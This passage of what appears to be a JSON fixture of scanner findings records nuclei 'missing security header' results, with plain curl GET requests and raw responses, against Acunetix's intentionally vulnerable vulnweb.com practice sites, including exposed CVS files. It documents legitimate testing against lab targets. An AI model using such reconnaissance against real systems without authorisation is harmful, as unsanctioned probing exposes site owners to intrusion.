href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 481, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:41:12.655Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 482, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries.Log", + "discovered_date": "2024-11-13T02:41:12.802Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries.Log HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 483, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/partials", + "discovered_date": "2024-11-13T02:41:12.943Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/partials HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 484, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/contact", + "discovered_date": "2024-11-13T02:41:13.083Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /contact HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 485, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:41:13.218Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 486, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:41:13.358Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 487, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:13.491Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 488, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:13.645Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 489, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:13.790Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 490, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; 